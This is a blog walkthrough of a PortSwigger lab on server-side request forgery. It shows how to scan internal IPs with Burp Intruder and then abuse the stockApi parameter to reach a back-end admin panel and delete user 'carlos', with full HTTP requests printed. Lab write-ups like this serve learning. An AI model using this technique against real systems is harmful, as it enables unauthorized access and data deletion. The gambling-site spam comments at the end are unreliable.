SSRF Attack With Another Back-End System

Hello Cyberman!
How are u? I hope you fine.
This article subject ssrf another back-end system attack method.
What is SSRF if you don’t know, read this post. For click read article.

Now, We are this attack method maintain with different example.

This method name: Another back-end system. If you say how does this work, I telling. Above all, we must not forget: SSRF is server-side attack. In this scenario, server get it data from another server.

As above picture seen, in this scenario when client computer input web site, the server computer (ie IP address: 192.168.0.155) is showing the website to the client computer.
When the client computer requests another data, the computer with the ip number 192.168.0.155 requests the data from the other computer. (Other computer is ip address: 192.168.0.200)

These two computers are actually on the same network. And when we want to delete a data on the computer with the IP address 192.168.0.155, we need to find the data source because the source of the data is the computer numbered 192.168.0.200.

That scenario example is in Portswigger. Click for example lab. Then okay, so click button “Access the lab” for enter to lab. As below seen picture.

Press the “View Details” button on any stock on the screen that opens. When we click the “Check Stock” button to find out the amount of this stock in other branches, it gives us a number.

Now, think different. If this server is receiving data from another server, can I retrieve or modify other data from that the server? Answer is yes. We need a program for seen package in request/response. Its name, Burpsuite. I did mean before this article what is Burpsuite in this article.

Now we open burpsuite. And then when Intercept on open click “Check stock” button. Now, result response from server like as below seen picture.

And the “stockApi” parameter is in front of us. We are ip address change in parameter. Now, we adding “http://192.168.0.1:8080/admin” parameter of “stockApi”. As below seen picture.

A ip address give to number 0-255. There are many numbers between 0-255. It would not be right to try one by one. We use the wonderful feature in has Burp Suite, “Intruder”.

So, let’s send our package to the “Intruder” area with burpsuite. To do this, right click on the package and click “Send to Instruder”.

As seen in the picture above, Burp Suite will automatically try the green areas for us. Firstly, click “Clear” button for unselect all area. Then just select “1” in ip address area. And click button “Add $”

Then do settings payloads. As below seen picture like do it.

Then click button “Start attack” for attack. Okay, now front us attack screen open. And it’s try to number for us one by one. We need status number 200 in status area. As seen in the picture below. Drawn in yellow. The number 200 should be displayed in the status column.

I had to reboot due to Burp Suite connection problem. Therefore, I had the status code “200” at number “12”. Like as below seen picture.

Ok, now let’s manipulate the package with Burp Suite. I add “http://192.168.0.12:8080/admin” to “stockApi” parameter. Then I send the package by pressing the forward button.

Then click “delete” button for carlos delete. And look package in Burp Suite.
As below seen text result:

GET /http://192.168.0.12:8080/admin/delete?username=carlos HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Okay now, we are take it GET method. And we editing like below text:

POST /product/stock HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Content-Length: 96
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

stockApi=http://192.168.0.12:8080/admin/delete?username=carlos

Then we send the package via Burp Suite.

And finally!.. First get it admin panel then deleted carlos…

Have a nice day with lots of informatics 🙂

35 Comments

  1. of course like your web-site but you have to test the spelling
    on quite a few of your posts. Many of them are
    rife with spelling problems and I find it very troublesome to tell the truth then again I will definitely come back again.

    Here is my web page: 사설토토

  2. Great article! This is the type of info that are supposed to be shared across the internet.
    Shame on the seek engines for no longer positioning this publish upper!

    Come on over and consult with my web site .
    Thanks =)

  3. I may need your help. I tried many ways but couldn’t solve it, but after reading your article, I think you have a way to help me. I’m looking forward for your reply. Thanks.

  4. Have you ever considered creating an e-book or guest authoring on other
    websites? I have a blog centered on the same ideas you discuss and would really like to have you share some stories/information.
    I know my readers would enjoy your work. If you are even remotely interested, feel free to send me an e mail.

    My webpage … 소액결제현금화

  5. This design is incredible! You certainly know
    how to keep a reader entertained. Between your wit and your videos,
    I was almost moved to start my own blog (well, almost…HaHa!) Great job.
    I really loved what you had to say, and more than that, how you presented it.
    Too cool!

    Feel free to visit my website … 먹튀검증

  6. With havin so much content and articles do you ever run into any problems of plagorism
    or copyright infringement? My website has a lot of completely
    unique content I’ve either authored myself or
    outsourced but it appears a lot of it is popping it up all
    over the internet without my authorization. Do you
    know any techniques to help prevent content from being stolen?
    I’d really appreciate it.

    Also visit my blog post :: 바카라사이트

  7. When I originally commented I appear to have clicked the -Notify me when new comments are added- checkbox and from now on every time a comment is added I receive four emails with the same comment. There has to be a way you can remove me from that service? Many thanks!

  8. When I initially commented I clicked the “Notify me when new comments are added”
    checkbox and now each time a comment is added I get several
    e-mails with the same comment. Is there any way you can remove me from that service?
    Thanks!

    Feel free to visit my web blog; 슬롯사이트

  9. Heya just wanted to give you a brief heads up and let you
    know a few of the pictures aren’t loading correctly.
    I’m not sure why but I think its a linking issue. I’ve
    tried it in two different internet browsers and both show the same results.

    Also visit my website: 토토사이트

  10. Dear Website Owner,

    I hope this email finds you well. I recently discovered your website and was impressed by the quality of your content and the helpful information you offer to your audience. In light of this, I would like to propose a backlink exchange that could benefit both our websites.

    My website, https://m.cheapestdigitalbooks.com/, is focused on providing affordable digital books to readers around the world. We currently have a strong online presence with a Domain Authority (DA) of 13, a Page Authority (PA) of 52, and a Domain Rating (DR) of 78. Our website features 252K backlinks, with 95% of them being dofollow, and has established connections with 5.3K linking websites, with 23% of these being dofollow links.

    I believe that a mutually beneficial backlink exchange could be of great value for both of our websites, as it may lead to an increase in website authority and improve our search engine rankings. In this collaboration, I am willing to add backlinks from my website using your desired keywords and anchor texts. In return, I would be grateful if you could include backlinks with my desired keywords and anchor texts on your website.

    I kindly request that you visit my website, https://m.cheapestdigitalbooks.com/, to get a sense of the potential benefits this partnership could bring to your site. I am confident that this collaboration will provide a win-win situation for both parties, and I look forward to learning more about your thoughts on this proposal.

    Thank you for considering my offer. I am excited about the potential growth this partnership may bring to our websites and am eager to discuss the details further. Please do not hesitate to reach out to me at your convenience.

    Best regards,

    David E. Smith
    Email: david@cheapestdigitalbooks.com
    Address: 3367 Hood Avenue, San Diego, CA 92117

Leave a Reply

Your email address will not be published. Required fields are marked *